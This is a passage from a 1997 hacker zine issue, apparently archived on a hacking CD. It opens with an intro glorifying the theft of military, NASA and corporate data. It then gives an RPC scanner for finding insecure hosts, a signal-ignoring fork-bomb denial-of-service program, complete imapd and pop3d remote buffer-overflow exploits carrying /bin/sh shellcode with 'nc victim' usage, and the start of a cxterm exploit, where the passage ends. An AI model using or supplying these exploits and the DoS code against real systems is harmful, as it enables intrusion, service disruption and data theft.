home *** CD-ROM | disk | FTP | other *** search
/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / magazines / crh / crh003.txt < prev    next >
Encoding:
Text File  |  1998-06-25  |  125.3 KB  |  3,306 lines

  1. ───────────────────────────────────────────────────────────────────────────────
  2.                              .oO The CodeZero Oo.
  3.                              .oO   Presents   Oo.
  4. ───────────────────────────────────────────────────────────────────────────────
  5.  
  6.             Welcome to issue 3, the special summer edition of...
  7.  
  8. ───────────────────────────────────────────────────────────────────────────────
  9.  
  10.        /IIIIIIIIII          /IIIIIIIIII           /III   /III
  11.        \ III_____/          \ III___/III          \ III  \ III
  12.         \ III                \ III  \ III          \ III  \_III
  13.          \ III  onfidence     \ IIIIIIII  emains    \ IIIIIIIIII  igh
  14.           \ III                \ III__/III           \ III__/ III
  15.            \ III                \ III  \ III          \ III  \ III
  16.             \ IIIIIIIIII   ___   \ III  \ III   ___    \ III  \ III   ___
  17.              \_________/  /\__\   \__/   \__/  /\__\    \__/   \__/  /\__\
  18.                           \/__/                \/__/                 \/__/
  19.  
  20.  
  21.                                   [15/o7/97]
  22. ───────────────────────────────────────────────────────────────────────────────
  23.  
  24.                           CRH Editor : Tetsu Khan
  25.            Official CRH Kung-Fu Film : Turf On A Rope
  26.                    Official CRH Pimp : so1o
  27.     Official CRH Spic With A Red Hat : xFli
  28.        Official CRH T-Shirt Supplier : NightRage
  29.      Official CRH Visual Basic Coder : \\StOrM\\ aka Jason Sloderbeck
  30.           Official CRH Print Brother : Digital Darkness
  31.  
  32. ───────────────────────────────────────────────────────────────────────────────
  33.                   
  34.                    .-----------[ An Official ]-----------.
  35.                    :      .-----.  .----.   .--.--.      :
  36.                    :      :  .--'  : .-. :  :  :  :      :
  37.                    !_-::  :  :     : `-' ;  :  .  :  ::-_!
  38.                    :~-::  :: :     :: . :   ::    :  ::-~:
  39.                    :      ::.`--.  ::.:  :  ::.:  :      :
  40.                    :      `-----'  `--'--'  `--'--'      :
  41.                    !_-::                             ::-_!
  42.                    :~-::-[ Confidence Remains High ]-::-~:
  43.                    :~-::                             ::-~:
  44.                    `-----------[ Production ]------------'
  45.  
  46. ───────────────────────────────────────────────────────────────────────────────
  47.   In This "Added Linux Exploits" Issue :
  48. ───────────────────────────────────────────────────────────────────────────────
  49.  
  50.  -----=>  Section A  :  Introduction And Cover Story.
  51.  
  52.  1. Confidence Remains High issue 3 [summer edition]...: Tetsu Khan
  53.  2. The network is our playground......................: so1o
  54.  
  55.  -----=>  Section B  :  Exploits And Code.
  56.  
  57.  1. RPC-Check.sh.......................................: yo
  58.  2. DoS : superforker.c................................: Vio
  59.  3. Cool Bot Juarez : personal.tcl.....................: Scorn
  60.  
  61.  4. Linux imapd remote exploit.........................: Savage
  62.  5. Linux pop3 remote exploit..........................: Savage
  63.  6. Linux cxterm exploit...............................: Ming Zhang
  64.  7. Linux nlspath exploit..............................: Solar Designer
  65.  
  66.  8. Solaris 2.5.1 ps exploit...........................: J. Zbiciak
  67.  9. 0wned.c............................................: so1o
  68.  
  69.  -----=>  Section C  :  Phones / Scanning / Radio.
  70.  
  71.  1. DTMF Decoder.......................................: xFli
  72.  2. Dealing With Directory Assistance Operators........: Qytpo
  73.  3. Russian fone #'s (+7 095 XXXxxxx)..................: CyberLirik
  74.  4. How to fuck over a UK payphone.....................: so1o / NightRage
  75.  5. Radio link for TI-85 calculators...................: Michael Jan
  76.  
  77.  -----=>  Section D  :  Miscellaneous.
  78.  
  79.  1. More sIn inf0z.....................................: The CodeZero + Friends
  80.  2. Rooting From Bin...................................: so1o
  81.  3. DNS Spoofing.......................................: so1o
  82.  4. FreeNet............................................: TrN
  83.  5. Backdoors Revised..................................: Blk-Majik
  84.  6. One Last Thing About The Infamous pHf Technique....: so1o
  85.  7. Test-cgi holes.....................................: so1o
  86.  8. Tree raping........................................: digitalboy [DD]
  87.  9. .htpasswd + .htaccess..............................: Cain [DD]
  88.  
  89.  -----=>  Section E  :  World News.
  90.  
  91.  1. Some History.......................................: nobody
  92.  2. [GUNNAR] and MadSeason and sIn.....................: so1o
  93.  3. "Welcome to the [D]epartment of [O]wned [E]nergy"..: so1o
  94.  4. LOPHT.COM..........................................: so1o
  95.  5. AAA Report.........................................: so1o
  96.  6. Lamer of the fucking year : pSId (DALnet)..........: so1o
  97.  
  98.  ------=> Section F  :  Projects.
  99.  
  100.  1. STiK...............................................: mstrhelix
  101.  
  102.  -----=> Section G  :  The End. (+ Personal Column)
  103.  
  104. ───────────────────────────────────────────────────────────────────────────────
  105. ===============================================================================
  106. ==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
  107. ===============================================================================
  108. ───────────────────────────────────────────────────────────────────────────────
  109.   1. Confidence Remains High issue 3 [summer edition] : Tetsu Khan
  110. ───────────────────────────────────────────────────────────────────────────────
  111.  
  112. Issue 4 will be out at the beginning of September, so to last you through
  113. the long hot summer nights, we present the special summer issue of
  114. Confidence Remains High, effectively issue 3 with more stuff in it.
  115.  
  116. blah blah blah....codez.com is going down so here's the list :
  117.  
  118.   Confidence Remains High distro site list...
  119.   -------------------------------------------
  120.  
  121.     http://insecurity.insecurity.org/codez/
  122.     http://www.r0ot.org
  123.     http://www.exceed.net
  124.     http://www.7thsphere.com/hpvac/hacking.html
  125.  
  126.     ftp://ftp.sekurity.org/users/so1o/
  127.  
  128.     ...And alot of other sites, just go looking around.
  129.  
  130. ───────────────────────────────────────────────────────────────────────────────
  131.   2. The network is our playground : so1o
  132. ───────────────────────────────────────────────────────────────────────────────
  133.  
  134. Just sit back for a few minutes and consider how much power we have as hackers,
  135. from our Linux boxes, or Wind0ze systems, we can connect to many thousands of
  136. Government or Military sites, as well as company networks where useful
  137. information such as credit card details can easily be found, all we need is
  138. the knowledge of holes in such systems, the means to exploit these holes, and
  139. the skills needed to "root" the system, thats all it takes.
  140.  
  141. In 15 minutes, a hacker could 0wn many important NASA systems, and then proceed
  142. to pull the following types of files from such a system...
  143.  
  144.  - Personnel information.
  145.  - Mission reports and test results.
  146.  - Satellite programs and information.
  147.  - Future mission dates.
  148.  
  149. Or say it was a military system, then that hacker, if he knew what he was doing
  150. would be able to gain access (with relative ease) to the following kinds of
  151. files...
  152.  
  153.  - Personnel information.
  154.  - Weapons reports.
  155.  - Tactical analysis.
  156.  - Future mission dates.
  157.  - Intelligence papers.
  158.  
  159.  
  160. Lets say that a hacker was to attack a company, such as Intel, then he would
  161. be able to access...
  162.  
  163.  - Product test results.
  164.  - Internal mail between users.
  165.  - Future plans or products.
  166.  - Blueprints.
  167.  
  168. ... then that hacker could sell off that companies research and development
  169.     reports to others, and make some ca$h.
  170.  
  171. It is clear to see, that from the power we have by just owning a computer and
  172. a modem is quite huge in the right hands, and that it is pretty simple to go
  173. out and find yourself some classified information if you really want to.
  174.  
  175. ───────────────────────────────────────────────────────────────────────────────
  176. ===============================================================================
  177. ==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
  178. ===============================================================================
  179. ───────────────────────────────────────────────────────────────────────────────
  180.   1. RPC-Check.sh : yo
  181. ───────────────────────────────────────────────────────────────────────────────
  182.  
  183. #!/bin/sh
  184. #rpc.chk 1.0
  185. #
  186. # Make sure you have got a newer version of Bourne Shell (SVR2 or newer)
  187. # that supports functions. It's usually located in /bin/sh5 (under ULTRIX OS)
  188. # or /bin/sh (Sun OS, RS/6000 etc) If it's located elsewhere, feel free to
  189. # change the magic number, indicating the type of executable Bourne Shell.
  190. #
  191. # The script obtains via nslookup utility a list of hostnames from a nameserver
  192. # and checks every entry of the list for active rexd procedures as well as
  193. # ypserver procedures. The output is a list of the sites that run those
  194. # daemons and are insecure.
  195. #  -yo.
  196.  
  197.  
  198. domainname=$1
  199. umask 022
  200. PATH=/bin:/usr/bin:/usr/ucb:/usr/etc:/usr/local/bin ; export PATH
  201.  
  202. #
  203. # Function collects a list of sites
  204. # from a nameserver. Make sure you've got the nslookup utility.
  205. #
  206. get_list() {
  207. (
  208. echo set type=ns
  209. echo $domainname
  210. ) | nslookup | egrep "nameserv" | cut -d= -f2> .tmp$$  2>/dev/null
  211. if [ ! -s .tmp$$ ]; then
  212. echo "No such domain" >&2
  213. echo "Nothing to scan" >&2
  214. exit 1
  215. fi
  216. for serv in `cat .tmp$$`;do
  217. (
  218. echo server $serv
  219. echo ls  $domainname
  220. ) | nslookup > .file$$ 2>/dev/null
  221. lines=`cat .file$$ | wc -l`
  222. tail -`expr $lines  - 7` .file$$  | cut -d" " -f2 > .file.tmp # .file
  223. sed -e "s/$/.$domainname/"  .file.tmp > .hosts$$
  224. rm -rf .file* .tmp$$
  225. sort .hosts$$ | uniq -q >> HOSTS$$; rm -rf .hosts$$
  226. done
  227. tr 'A-Z' 'a-z' <HOSTS$$ |sort|uniq -q > HOSTS.$domainname;rm -rf HOSTS$$
  228. }
  229.  
  230. # Function
  231.  
  232. rpc_calls()
  233. {
  234. for entry in `cat HOSTS.$domainname`; do
  235. (
  236. rpcinfo -t $entry ypserv >/dev/null  && echo $entry runs YPSERV ||  exit 1 # Error!
  237. ) >> .log  2>/dev/null
  238. (
  239. rpcinfo -t $entry rex >/dev/null && echo $entry runs REXD ||  exit 1 # Error !
  240.  ) >> .log  2>/dev/null
  241. done
  242. }
  243.  
  244. # Main
  245.  
  246. if [ "$domainname" = '' ];  then
  247. echo "Usage $0 domainname" >&2
  248. exit 1
  249. fi
  250. get_list
  251. echo "Checking $domainname domain" > .log
  252. echo "*****************************" >> .log
  253. echo "Totally `cat HOSTS.$domainname | wc -l` sites  to scan" >> .log
  254. echo "******************************" >> .log
  255. echo "started at `date`" >> .log
  256. echo "******************************" >> .log
  257. rpc_calls
  258. echo "******************************" >> .log
  259. echo "finished at `date`"  >> .log
  260.  
  261. ───────────────────────────────────────────────────────────────────────────────
  262.   2. DoS : superforker.c : Vio
  263. ───────────────────────────────────────────────────────────────────────────────
  264.  
  265. This program is fucking evil, I have tested it on a few systems and it just
  266. screws them over and sloooOOooows them right down, you cant throw anything at
  267. the shell, its pretty sadistic...
  268.  
  269.  
  270. /* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the
  271.    bugtraq
  272.  
  273.    This program is a beefed up classic denial of service fork()'er :)
  274.  
  275.    Compilation:
  276.  
  277.          on BSD type of systems do:  gcc -DBSD_C  -o cvn cvn.c
  278.         on SysV type of systems do:  gcc -DSYSV_C -o cvn cvn.c
  279.  
  280.     on my linux, I can compile it with both -DBSD_C and -DSYSV_C
  281.  
  282.     if your not sure, you can experiment, or compile it
  283.     without any -D'efines
  284.  
  285.  
  286.   In the future:
  287.  
  288.     SunOS signals ignored.
  289.     Creation of random symlinks for more gory destruction.
  290.     Using advanced technology coding to make the hard drive
  291.         blow up with a loud boom and the console explode causing
  292.         a nuclear meltdown.
  293.  
  294.   Direct All Suggestions And Flames to: Vio
  295.  
  296.   NOTE: this program is provided for educational purposes only, its author
  297.     will not take any responsibility for any stupid things you will
  298.     decide to do.
  299.  
  300.     this has been tested, but not the latest version of it.
  301. */
  302.  
  303. #include <stdio.h>
  304. #include <stdlib.h>
  305. #include <sys/types.h>
  306. #include <sys/stat.h>
  307. #include <fcntl.h>
  308. #include <unistd.h>
  309. #include <signal.h>
  310.  
  311. #define MAX_FILELEN 100    /* The _actual_ max length */
  312. #define MAX_DIRLEN 10
  313.  
  314. #define START_DIR "/tmp"   /* This can be substituted for any directory */
  315.                /* that you have write access to        */
  316.  
  317. void dirs_generator(void);
  318.  
  319. main(int argc, char *argv[])
  320. {
  321. int fp;
  322. char *buff;
  323. char chr;
  324.  
  325. unlink(argv[0]);
  326.  
  327. /* You might wanna ignore all the signals you can ignore.. */
  328. signal(SIGINT,    SIG_IGN);    /* If any of the signals don't work */
  329. signal(SIGHUP,    SIG_IGN);    /* on the system you are compiling  */
  330. signal(SIGTERM,    SIG_IGN);    /* them on, just erase that line    */
  331. signal(SIGALRM,    SIG_IGN);
  332. signal(SIGBUS,    SIG_IGN);
  333. signal(SIGFPE,    SIG_IGN);
  334. signal(SIGILL,    SIG_IGN);
  335. signal(SIGIOT,    SIG_IGN);
  336. signal(SIGPIPE,    SIG_IGN);
  337. signal(SIGQUIT,    SIG_IGN);
  338. signal(SIGSEGV,    SIG_IGN);
  339. signal(SIGTRAP,    SIG_IGN);
  340. signal(SIGUSR1,    SIG_IGN);
  341. signal(SIGUSR2,    SIG_IGN);
  342.  
  343. #ifdef BSD_C 
  344.     signal(SIGPROF, SIG_IGN);
  345.     signal(SIGSTOP, SIG_IGN);
  346.     signal(SIGTSTP, SIG_IGN);
  347.     signal(SIGTTIN,    SIG_IGN);
  348.     signal(SIGTTOU,    SIG_IGN);
  349.     signal(SIGVTALRM,    SIG_IGN);
  350.     signal(SIGXCPU,    SIG_IGN);
  351.     signal(SIGXFSZ,    SIG_IGN);
  352. #endif
  353.  
  354. #ifdef SYSV_C
  355.     signal(SIGPOLL,    SIG_IGN);
  356.     signal(SIGPWR,    SIG_IGN);
  357. #endif
  358.  
  359. if(fork()) {
  360.     printf("Now crashing and blowing up this system.. have a nice day\n");
  361.     printf("You can safely logout, and let the proggie do its work\n");
  362.     printf("or you can stick around and watch lag go from 0 to bitch\n");
  363.     printf("in a matter of seconds\n");
  364.     printf("                    --CoViN         \n");
  365.     exit(0);
  366.   }
  367. fp=open("/tmp/.foo",O_WRONLY|O_CREAT);
  368. if(fork()) {
  369.     while(1) {
  370.         fork();
  371.         buff = malloc(64000);
  372.         write(fp, buff, 64000);
  373.         system("uptime");
  374.      }
  375.  }
  376. dirs_generator();
  377. }
  378.  
  379.  
  380. void dirs_generator(void)
  381. {
  382. char alph[] = " abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
  383. char fl[MAX_FILELEN]; 
  384. char dir[MAX_DIRLEN];
  385. int i;
  386. int flen;
  387.  
  388. printf("Making dirs..\n");
  389. chdir(START_DIR);
  390.  
  391. fork();    /* For the simplicity of the code.. we also want more dir's from */
  392. fork(); /* the START_DIR                         */
  393. fork();
  394.  
  395. while(1) {
  396.     fork();
  397.     flen= (rand() % MAX_FILELEN) - 1;
  398.     for(i=0; i<flen; i++)
  399.                 fl[i] = alph[rand() % strlen(alph)];
  400.     fl[MAX_FILELEN-1]=0;
  401.     i=open(fl,O_WRONLY|O_CREAT);
  402.     write(i,"fuck you! CoViN",16);
  403.     close(i);
  404.  
  405.     flen= (rand() % MAX_DIRLEN) - 1;
  406.     for(i=0; i<flen; i++)
  407.         dir[i] = alph[rand() % strlen(alph)];
  408.     dir[MAX_DIRLEN-1]=0;
  409.     mkdir(dir,0);    
  410.     chdir(dir);
  411.        }
  412. }
  413.  
  414. ───────────────────────────────────────────────────────────────────────────────
  415.   3. Cool Bot Juarez : personal.tcl : Scorn
  416. ───────────────────────────────────────────────────────────────────────────────
  417.  
  418. # A simple example of using public responses to give the bot
  419. # a personality.  Send comments to SCORN (scorn@destiny.net).
  420. # pHEARSOMe in #linuxwarez on EFnet runs this exact TCL script
  421.  
  422. # flag to turn personality on and off
  423. set persona_flag 1
  424.  
  425. # min delay time between responses to prevent flooding
  426. set persona_wait 10
  427.  
  428. # binds to answer questions
  429.  
  430. bind pubm - "*one*know*if*\\?*"      pub_answer
  431. bind pubm - "*one*know*how*\\?*"     pub_answer
  432. bind pubm - "*pHEARS*\\?*"         pub_answer
  433. bind pubm - "*pHEARS*bot*"         pub_answer
  434.  
  435. # binds to answer greetings
  436.  
  437. bind pubm - "*re all*"         pub_greet
  438. bind pubm - "*hello all*"     pub_greet
  439. bind pubm - "*hi all*"         pub_greet
  440. bind pubm - "*sup*every*"     pub_greet
  441. bind pubm - "*sup*all*"         pub_greet
  442.  
  443.  
  444. # binds to answer goodbyes
  445.  
  446. bind pubm - "*cya*all"         pub_bye
  447. bind pubm - "*bbl*"         pub_bye
  448. bind pubm - "*bbia*"         pub_bye
  449. bind pubm - "*later*every*"     pub_bye
  450. bind pubm - "*bye*every*"        pub_bye
  451. bind pubm - "*ttyl*every*"     pub_bye
  452. bind pubm - "*later*all*"     pub_bye
  453. bind pubm - "*ttyl*all*"     pub_bye
  454. bind pubm - "*bye*all*"         pub_bye
  455.  
  456. # binds to answer STUPID questions
  457.  
  458. bind pubm - "*one*got*site*"     pub_stupid
  459.  
  460. # misc. binds
  461.  
  462. bind pubm - "*where*tk3play*"        pub_tk3
  463. bind pubm - "*url*tk3play*"        pub_tk3
  464. bind pubm - "*tk3play*where*"        pub_tk3
  465. bind pubm - "*tk3play*url*"        pub_tk3
  466. bind pubm - "*what*mp3*player*"    pub_tk3
  467. bind pubm - "*where*mp3*player*"   pub_tk3
  468.  
  469. # arrays of responses
  470.  
  471. set stupid(0)  "go ask for that in #linux, they might help you out there"
  472. set stupid(1)  "try ftp.linuxwarez.com!! it's got everything!!"
  473. set stupid(2)  "I got that, but I ain't givin it to you"
  474. set stupid(3)  "I tried to get that in #exceed today, but when i asked for it, it said 'cannot send to channel' but i don't want to send, i want to get!!! what am I doing wrong?"
  475. set stupid(4)  "no, but I got nekkid pics of sh00p if ya want."
  476. set stupid(5)  "no, but I got crabs, ya want some?"
  477. set stupid(6)  "I got that, I got that!!"
  478. set stupid(7)  "Talk to Trinitron, he's probably got that"
  479. set stupid(8)  "don't trade warez!!! its illegal!! you're gonna git busted!!"
  480. set stupid(9)  "I used to have that, but the fEDZ got muh warez CD and won't give it back :("
  481. set stupid(10) "why don't yew stop leeching and start offering, ya lamah"
  482. set stupid(11) "don't bother, it really sux.  I rm -rf'd that REAL quick."
  483. set stupid(12) "I got that, here, lemme send it over.  But i'm on a 2600 baud modem."
  484. set stupid(13) "when you get that, can you upload it to whitehouse.gov ftp site for me please?"
  485. set stupid(14) "Linus Torvalds is giving that away, email him bout it"
  486. set stupid(15) "I got that, but i'm only trading that for nude pics of sh00p."
  487. set stupid(16) "I got that, but i'm only trading that for Linux for win95"
  488. set stupid(17) "can you offer that up when ya git it? :)"
  489. set stupid_size 18
  490.  
  491. set answer(0)  "hellz yea"
  492. set answer(1)  "fuck no!"
  493. set answer(2)  "it's possible..."
  494. set answer(3)  "who cares? I shure as hell don't"
  495. set answer(4)  "I dunno, go ask in #lamer"
  496. set answer(5)  "I could tell ya, but then i'd have to kill ya."
  497. set answer(6)  "maybe"
  498. set answer(7)  "hmmm...."
  499. set answer(8)  "uh....."
  500. set answer(9)  "err...."
  501. set answer(10) "lemme think about that one for a sec"
  502. set answer(11) "I ain't no Answer Wizard"
  503. set answer(12) "RTFM"
  504. set answer(13) "nope"
  505. set answer(14) "um, no"
  506. set answer(15) "ya, i think so"
  507. set answer(16) "no way"
  508. set answer_size 17
  509.  
  510. set greets(0)  "sup"
  511. set greets(1)  "yo!"
  512. set greets(2)  "oh no not you again"
  513. set greets(3)  "hey whut's up"
  514. set greets(4)  "you came in the wrong room this ain't #dogsex,"
  515. set greets(5)  "go away"
  516. set greets(6)  "well look who's here, its"
  517. set greets(7)  "hey, i hear #netsex misses you,"
  518. set greets(8)  "we missed you"
  519. set greets(9)  "oh no, yew gotta be another #oldwarez lamer, aren't you,"
  520. set greet_size 10
  521.  
  522. set bye(0)  "lata"
  523. set bye(1)  "and don't come back"
  524. set bye(2)  "cyaz"
  525. set bye(3)  "goin to #sexpics again I see...yer a perv"
  526. set bye(4)  "bye"
  527. set bye(5)  "take it easy"
  528. set bye(6)  "see ya in hell"
  529. set bye_size 7
  530.  
  531. # general functions to answer questions randomly, has a
  532. # delay so other more specific binds will have priority
  533.  
  534. proc pub_answer {nick uhost hand channel args} {
  535.    global persona_flag answer_nick answer_channel
  536.    if {$persona_flag} {
  537.       set answer_nick $nick
  538.       set answer_channel $channel
  539.       utimer 1 _pub_answer
  540.    }
  541.    return 0
  542. }
  543.  
  544. proc _pub_answer {} {
  545.    global answer answer_size persona_flag answer_nick answer_channel
  546.    if {$persona_flag} {
  547.       persona_pause
  548.       putserv "PRIVMSG $answer_channel :$answer([rand $answer_size])"
  549.       putlog "<<$answer_nick>> Persona-Answer"
  550.       return 1
  551.    }
  552.    return 0
  553. }
  554.  
  555. # function to answer greetings
  556.  
  557. proc pub_greet {nick uhost hand channel args} {
  558.    global greets greet_size persona_flag
  559.    if {$persona_flag} {
  560.       persona_pause
  561.       putserv "PRIVMSG $channel :$greets([rand $greet_size]) $nick"
  562.       putlog "<<$nick>> Persona-Greet"
  563.       return 1
  564.    }
  565.    return 0
  566. }
  567.  
  568. # function to answer stupid stuff
  569.  
  570. proc pub_stupid {nick uhost hand channel args} {
  571.    global stupid stupid_size persona_flag
  572.    if {$persona_flag} {
  573.       persona_pause
  574.       putserv "PRIVMSG $channel :$nick , $stupid([rand $stupid_size])"
  575.       putlog "<<$nick>> Persona-Stupid"
  576.       return 1
  577.    }
  578.    return 0
  579. }
  580.  
  581. # function to answer goodbyes
  582.  
  583. proc pub_bye {nick uhost hand channel args} {
  584.    global bye bye_size persona_flag
  585.    if {$persona_flag} {
  586.       persona_pause
  587.       putserv "PRIVMSG $channel :$bye([rand $bye_size]) $nick"
  588.       putlog "<<$nick>> Persona-Bye"
  589.       return 1
  590.    }
  591.    return 0
  592. }
  593.  
  594. # misc. functions
  595.  
  596.   proc pub_tk3 {nick uhost hand channel args} {
  597.    global persona_flag
  598.    if {$persona_flag} {
  599.       persona_pause
  600.       putserv "PRIVMSG $channel :$nick, check out tk3play at bleh"
  601.       putlog "<<$nick>> Persona-tk3play"
  602.       return 1
  603.    }
  604.    return 0
  605. }
  606.  
  607.  
  608. # function to enforce minimum pause between responses
  609.  
  610. proc persona_pause {} {
  611.    global persona_flag persona_wait
  612.    if {$persona_flag} {
  613.       persona_off
  614.       utimer $persona_wait persona_on
  615.    }
  616.    return 1
  617. }
  618.  
  619. # functions to turn the personality on and off
  620.  
  621. proc persona_on {} {
  622.    global persona_flag
  623.    set persona_flag 1
  624.    return 1
  625. }
  626.  
  627. proc persona_off {} {
  628.    global persona_flag
  629.    set persona_flag 0
  630.    return 1
  631. }
  632.  
  633. putlog "Scorn's persona.tcl is loaded"
  634.  
  635. ───────────────────────────────────────────────────────────────────────────────
  636.   4. Linux imapd remote exploit : Savage
  637. ───────────────────────────────────────────────────────────────────────────────
  638.  
  639. /*
  640.  * IMAPd Linux/intel remote xploit by savage@apostols.org 1997-April-05
  641.  *
  642.  * Workz fine against RedHat and imapd distributed with pine
  643.  *
  644.  * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!!
  645.  *
  646.  * usage:
  647.  *    $ (imap 0; cat) | nc victim 143
  648.  *              |
  649.  *              +--> usually from -1000 to 1000 ( try in steps of 100 )
  650.  */
  651.  
  652. #include <stdio.h>
  653.  
  654. char shell[] = 
  655. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  656. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  657. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  658. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  659. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  660. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  661. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  662. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  663. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  664. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  665. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  666. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  667. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  668. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  669. "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
  670. "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
  671. "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
  672. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  673. "\xe8\xc0\xff\xff\xff/bin/sh";
  674.  
  675. char username[1024+255];
  676.  
  677. void main(int argc, char *argv[]) {
  678.     int i,a;
  679.     long val;
  680.     
  681.     if(argc>1)
  682.         a=atoi(argv[1]);
  683.     else
  684.         a=0;
  685.     
  686.     strcpy(username,shell);
  687.     
  688.     for(i=strlen(username);i<sizeof(username);i++)
  689.         username[i]=0x90; /* NOP */
  690.  
  691.     val = 0xbffff501 + a;
  692.  
  693.     for(i=1024;i<strlen(username)-4;i+=4) 
  694.     {
  695.         username[i+0] = val & 0x000000ff;
  696.         username[i+1] = (val & 0x0000ff00) >> 8;
  697.         username[i+2] = (val & 0x00ff0000) >> 16;
  698.         username[i+3] = (val & 0xff000000) >> 24;
  699.     }
  700.     
  701.     username[ sizeof(username)-1 ] = 0;
  702.     
  703.         printf("%d LOGIN \"%s\" pass\n", sizeof(shell), username);
  704. }
  705.  
  706. ───────────────────────────────────────────────────────────────────────────────
  707.   5. Linux pop3 remote exploit : Savage
  708. ───────────────────────────────────────────────────────────────────────────────
  709.  
  710. /*
  711.  * pop3d Linux/intel remote xploit by savage@apostols.org 1997-April-05
  712.  *
  713.  * workz fine against old pop3d distributed with pine.
  714.  *
  715.  * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore and the rest of ToXyn !!!
  716.  *
  717.  * usage:
  718.  *      $ (imap 0; cat) | nc victim 143   -- "doesnt pop3 run on 110?" - so1o
  719.  *              |
  720.  *              +--> usually from -100 to 100
  721.  */
  722.  
  723. #include <stdio.h>
  724.  
  725. char shell[] = 
  726. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  727. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  728. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  729. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  730. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  731. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  732. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  733. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  734. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  735. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  736. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  737. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  738. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  739. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  740. "\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"
  741. "\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"
  742. "\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"
  743. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  744. "\xe8\xc0\xff\xff\xff/bin/sh";
  745.  
  746. char username[1024+255];
  747.  
  748. void main(int argc, char *argv[]) {
  749.     int i,a;
  750.     long val;
  751.     
  752.     if(argc>1)
  753.         a=atoi(argv[1]);
  754.     else
  755.         a=0;
  756.     
  757.     strcpy(username,shell);
  758.     
  759.     for(i=strlen(username);i<sizeof(username);i++)
  760.         username[i]=0x90; /* NOP */
  761.  
  762.     val = 0xbffff501 + a;
  763.  
  764.     for(i=1024;i<strlen(username)-4;i+=4) 
  765.     {
  766.         username[i+0] = val & 0x000000ff;
  767.         username[i+1] = (val & 0x0000ff00) >> 8;
  768.         username[i+2] = (val & 0x00ff0000) >> 16;
  769.         username[i+3] = (val & 0xff000000) >> 24;
  770.     }
  771.     
  772.     username[ sizeof(username)-1 ] = 0;
  773.     
  774.         printf("USER %s\nPASS Yoshemite\n", username);
  775. }
  776.  
  777. ───────────────────────────────────────────────────────────────────────────────
  778.   6. Linux cxterm exploit : Ming Zhang
  779. ───────────────────────────────────────────────────────────────────────────────
  780.  
  781. /*
  782.  
  783.    cxterm buffer overflow exploit for Linux.  This code is tested on
  784.    both Slackware 3.1 and 3.2.
  785.  
  786.                                         Ming Zhang
  787.                                         mzhang@softcom.net
  788. */
  789.  
  790. #include <unistd.h>
  791. #include <stdio.h>
  792. #include <stdlib.h>
  793. #include <fcntl.h>
  794.  
  795. #define CXTERM_PATH "/usr/X11R6/bin/cxterm"
  796. #define BUFFER_SIZE 1024
